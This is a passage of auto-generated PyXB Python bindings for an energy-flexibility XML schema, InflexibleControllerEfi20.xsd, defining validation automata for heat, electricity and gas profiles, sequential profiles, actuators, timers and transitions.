global _BuildAutomaton_9
del _BuildAutomaton_9
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(HeatProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 191, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
HeatProfile._Automaton = _BuildAutomaton_9()
HeatProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_5, scope=HeatProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 203, 3)))
def _BuildAutomaton_10 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_10
del _BuildAutomaton_10
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(HeatProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 203, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
HeatProbabilityProfile._Automaton = _BuildAutomaton_10()
CTD_ANON_5._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'temperature'), ProbabilityAttributes, scope=CTD_ANON_5, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6)))
CTD_ANON_5._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), ProbabilityAttributes, scope=CTD_ANON_5, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6)))
CTD_ANON_5._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), ProbabilityAttributes, scope=CTD_ANON_5, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6)))
def _BuildAutomaton_11 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_11
del _BuildAutomaton_11
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_5._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'temperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_5._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_5._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'thermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_5._Automaton = _BuildAutomaton_11()
SupportedCommodities._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'commodityType'), CommodityEnum, scope=SupportedCommodities, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 228, 3)))
def _BuildAutomaton_12 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_12
del _BuildAutomaton_12
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(SupportedCommodities._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'commodityType')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 228, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
SupportedCommodities._Automaton = _BuildAutomaton_12()
CurtailmentOptions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOption'), CurtailmentOption, scope=CurtailmentOptions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3)))
def _BuildAutomaton_13 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_13
del _BuildAutomaton_13
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CurtailmentOptions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOption')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CurtailmentOptions._Automaton = _BuildAutomaton_13()
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile'), ElectricityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile'), ElectricityProbabilityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasProfile'), GasProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile'), GasProbabilityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatProfile'), HeatProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile'), HeatProbabilityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4)))
def _BuildAutomaton_14 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_14
del _BuildAutomaton_14
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 293, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 297, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 301, 3))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
ProfileContainer._Automaton = _BuildAutomaton_14()
SequentialProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'maxIntervalBefore'), pyxb.binding.datatypes.duration, scope=SequentialProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 353, 3)))
SequentialProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternatives'), SequentialProfileAlternatives, scope=SequentialProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 354, 3)))
def _BuildAutomaton_15 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_15
del _BuildAutomaton_15
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(SequentialProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'maxIntervalBefore')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 353, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(SequentialProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternatives')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 354, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfile._Automaton = _BuildAutomaton_15()
SequentialProfileAlternatives._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternative'), SequentialProfileAlternative, scope=SequentialProfileAlternatives, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 367, 3)))
def _BuildAutomaton_16 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_16
del _BuildAutomaton_16
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternatives._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternative')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 367, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfileAlternatives._Automaton = _BuildAutomaton_16()
SequentialProfiles._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfile'), SequentialProfile, scope=SequentialProfiles, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 372, 3)))
def _BuildAutomaton_17 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_17
del _BuildAutomaton_17
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(SequentialProfiles._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 372, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfiles._Automaton = _BuildAutomaton_17()
SequentialProfileInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr'), pyxb.binding.datatypes.int, scope=SequentialProfileInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 389, 3)))
SequentialProfileInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr'), pyxb.binding.datatypes.int, scope=SequentialProfileInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 390, 3)))
SequentialProfileInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTime'), pyxb.binding.datatypes.dateTime, scope=SequentialProfileInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 391, 3)))
def _BuildAutomaton_18 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_18
del _BuildAutomaton_18
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(SequentialProfileInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 389, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(SequentialProfileInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 390, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(SequentialProfileInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTime')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 391, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfileInstruction._Automaton = _BuildAutomaton_18()
SequentialProfileInstructions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstruction'), SequentialProfileInstruction, scope=SequentialProfileInstructions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 396, 3)))
def _BuildAutomaton_19 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_19
del _BuildAutomaton_19
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(SequentialProfileInstructions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 396, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfileInstructions._Automaton = _BuildAutomaton_19()
Actuator._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodity'), CommodityEnum, scope=Actuator, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 425, 3)))
def _BuildAutomaton_20 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_20
del _BuildAutomaton_20
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(Actuator._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodity')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 425, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Actuator._Automaton = _BuildAutomaton_20()
Actuators._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuator'), Actuator, scope=Actuators, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 432, 3)))
def _BuildAutomaton_21 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_21
del _BuildAutomaton_21
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(Actuators._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuator')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 432, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Actuators._Automaton = _BuildAutomaton_21()
Timers._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timer'), Timer, scope=Timers, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 442, 3)))
def _BuildAutomaton_22 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_22
del _BuildAutomaton_22
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(Timers._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timer')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 442, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Timers._Automaton = _BuildAutomaton_22()
Transitions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transition'), Transition, scope=Transitions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 447, 3)))
def _BuildAutomaton_23 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_23
del _BuildAutomaton_23
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(Transitions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transition')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 447, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Transitions._Automaton = _BuildAutomaton_23()
TimerReferences._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerReference'), CTD_ANON_9, scope=TimerReferences, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 452, 3)))
def _BuildAutomaton_24 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_24
del _BuildAutomaton_24
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(TimerReferences._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerReference')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 452, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
TimerReferences._Automaton = _BuildAutomaton_24()
Transition._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTimers'), TimerReferences, scope=Transition, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 461, 3)))
Transition._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'blockingTimers'), TimerReferences, scope=Transition, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 462, 3)))
def _BuildAutomaton_25 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_25
del _BuildAutomaton_25
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 461, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 462, 3))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Transition._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTimers')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 461, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(Transition._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'blockingTimers')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 462, 3))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
Transition._Automaton = _BuildAutomaton_25()
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3)))
